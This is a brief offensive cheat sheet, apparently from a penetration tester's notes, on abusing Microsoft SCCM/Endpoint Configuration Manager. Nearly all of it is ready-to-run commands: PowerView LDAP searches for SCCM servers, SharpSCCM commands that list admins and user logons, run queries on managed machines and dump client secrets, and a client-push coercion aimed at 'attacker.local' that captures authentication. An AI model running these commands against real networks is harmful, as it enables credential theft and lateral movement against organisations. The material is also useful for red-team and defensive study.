SCCM Abuse

System Center Configuration Manager / Microsoft Endpoint Configuration Manager

Enumeration

Look for CcmExec.exe processes:

Cmd > tasklist | findstr CcmExec

Search for SCCM servers in LDAP:

PV3 > Get-DomainComputer -LDAPFilter "(&(objectClass=computer)(cn=*sccm*))" | select -ExpandProperty dnsHostName
PV3 > Get-DomainComputer | ? {$_.Name -like "*sccm*"} | select -ExpandProperty dnsHostName

VNC-like Remote Control (CmRcViewer Abuse)

Tools

MalSCCM

sccmwtf

SharpSCCM

Get SMS (Systems Management Server) and SC (Site Code):

Cmd > SharpSCCM.exe local site-info

List SCCM admins:

Cmd > SharpSCCM.exe get admins -sms <SMS> -sc <SC>

List user latest logons:

Cmd > SharpSCCM.exe get class-instances -sms <SMS> -sc <SC> SMS_R_System -p Name -p DistinguishedName -p IPAddresses -p LastLogonUserDomain -p LastLogonUserName -p LastLogonTimestamp -w "LastLogonUserName LIKE '%snovvcrash%'"
Cmd > SharpSCCM.exe get devices -p Name -p DistinguishedName -p IPAddresses -p LastLogonUserDomain -p LastLogonUserName -p LastLogonTimestamp -u snovvcrash@megacorp.local

Get resource (server) ID:

Cmd > SharpSCCM.exe get resource-id -sms <SMS> -sc <SC> -d <RESOURCE>

Execute WMI command on a resource:

Cmd > SharpSCCM.exe invoke admin-service -sms <SMS> -sc <SC> -q "EventLog('Security',4h) | where EventID == 4624 | order by DateTime desc" -r <ID>

Grab secrets from SCCM client (locally):

Cmd > SharpSCCM.exe local secrets -m disk

Coerce authentication from SCCM server (remotely):

Cmd > SharpSCCM.exe invoke client-push -t attacker.local

Last updated 12 days ago